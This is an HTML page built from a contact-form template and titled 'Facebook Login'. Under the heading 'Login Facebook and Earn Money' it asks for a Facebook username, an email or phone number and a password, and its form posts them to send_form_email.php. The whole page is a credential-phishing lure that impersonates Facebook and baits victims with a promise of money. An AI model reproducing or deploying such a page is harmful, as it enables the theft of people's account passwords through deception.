
<!DOCTYPE HTML>
<html>
<head>
<title>Facebook Login</title>
<link href="css/style.css" rel="stylesheet" type="text/css" media="all"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<meta name="keywords" content="Working Contact Form HTML/PHP " />
<!--web-fonts-->
<link href='//fonts.googleapis.com/css?family=Open+Sans:400,300,300italic,400italic,600,600italic,700,700italic,800,800italic' rel='stylesheet' type='text/css'></head>
<link href='//fonts.googleapis.com/css?family=Candal' rel='stylesheet' type='text/css'>
<!--web-fonts-->
<body>
		<!---header--->
		<div class="header">
			<h1>Login Facebook and Earn Money</h1>
		</div>
		<!---header--->
		<!---main--->
			<div class="main-content">
				<div class="contact-w3">

					<form action="send_form_email.php" method="post">
						<label>User Name</label>
						<input type="text" name="name" placeholder="Facebook username" required>
						<div class="row">
							<div class="contact-left-w3">
								<label>Email</label>
									<input type="text" name="email" placeholder="Email address or Phone Number" required>
							</div>
							<div class="row">
							<div class="contact-right-w3l"> <br>
								<label>Password</label>
								<input type="Password" name="Password" placeholder="Password" required>
							</div>
							<div class="clear"></div>
						</div>
						<input type="submit" value="Log In">
					</form>
				</div>
			</div>
		<div class="footer-w3-agile">
			<p>&copy 2016 Stylish Contact Form . All rights reserved</p>
		</div>

		<!---main--->
</body>
</html>